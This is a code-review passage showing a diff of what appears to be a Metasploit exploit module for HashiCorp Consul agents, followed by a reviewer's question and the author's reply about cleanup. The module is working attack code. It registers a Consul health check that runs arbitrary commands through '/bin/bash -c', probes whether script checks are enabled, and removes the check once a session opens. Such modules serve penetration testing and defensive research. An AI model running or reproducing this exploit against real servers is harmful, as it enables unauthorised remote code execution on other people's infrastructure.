modules/exploits/multi/misc/consul_agent.rb

```diff
@@ -0,0 +1,133 @@
+      OptString.new('CHECK_NAME', [true, "The Consul Agent check name", rand_text_alphanumeric(20)]),
+      OptString.new('ACL_TOKEN', [false, "The Consul Agent ACL token (called acl_master_token)", ""]),
+      Opt::RPORT(8500)
+    ])
+  end
+
+  def register_check(name: datastore['CHECK_NAME'], shell: "/bin/bash", args: [], interval: "1s", timeout: "86400s")
+    response = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(datastore['PATH'], "/v1/agent/self"),
+      'headers'   => {
+        'X-Consul-Token' => datastore['ACL_TOKEN']
+      }
+    })
+
+    use_new_api = true
+    if response and response.code == 200
+      begin
+        agent_info = JSON.parse(response.body)
+
+        use_new_api = Gem::Version.new(agent_info["Config"]["Version"]) > Gem::Version.new("1.0.0")
+      rescue JSON::ParserError
+        fail_with(Failure::Unknown, 'Failed to parse JSON output.')
+      end
+    end
+
+    data = { 'ID' => datastore['CHECK_NAME'], 'Name' => datastore['CHECK_NAME'], "Interval" => interval, "Timeout" => timeout}
+    if use_new_api
+      data.merge!({ "Shell" => shell, "Args" => args })
+    else
+      data.merge!({ "Script" => args.map { |s| '"' + s + '"' }.join(" ") })
+    end
+    response = send_request_cgi({
+      'uri'       => normalize_uri(datastore['PATH'], '/v1/agent/check/register'),
+      'method'    => 'PUT',
+      'data'      => data.to_json,
+      'headers'   => {
+        'Content-Type'   => 'application/json',
+        'X-Consul-Token' => datastore['ACL_TOKEN']
+      }
+    })
+
+    return response
+  end
+
+  def deregister_check()
+    return send_request_cgi({
+      'uri'       => normalize_uri(datastore['PATH'], '/v1/agent/check/deregister/', datastore['CHECK_NAME']),
+      'method'    => 'PUT',
+      'headers'   => {
+        'Content-Type'   => 'application/json',
+        'X-Consul-Token' => datastore['ACL_TOKEN']
+      }
+    })
+  end
+
+  def check
+    response = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(datastore['PATH'], "/v1/agent/self"),
+      'headers'   => {
+        'X-Consul-Token' => datastore['ACL_TOKEN']
+      }
+    })
+
+    if response and response.code == 200
+      begin
+        agent_info = JSON.parse(response.body)
+
+        return Exploit::CheckCode::Vulnerable if agent_info["DebugConfig"]["EnableScriptChecks"] == true
+        return Exploit::CheckCode::Safe
+      rescue JSON::ParserError
+        fail_with(Failure::Unknown, 'Failed to parse JSON output.')
+      end
+    end
+
+    return Exploit::CheckCode::Unknown
+  end
+
+  def on_new_session(session)
+    response = deregister_check()
+    if response and response.code != 200
+      print_error("Failed to deregister the check #{datastore['CHECK_NAME']}")
+    end
+  end
+
+
+  def execute_command(cmd, opts = {})
+    response = register_check(args: ['/bin/bash', '-c', cmd])
```

Comment:
`execute_command` often runs many times. Is it ok to have multiple scripts registered with the same name? Does the command execute right away? If so, can you immediately deregister it? That might make the cleanup a little more reliable.

Reply:
The script name is unique on the Consul Agent. If the name already exists, the script will be updated.
I cannot deregister it immediately as we need to wait for the script to be executed once. The time may vary depending on the connection. This is why I deregister the script when we actually have the session.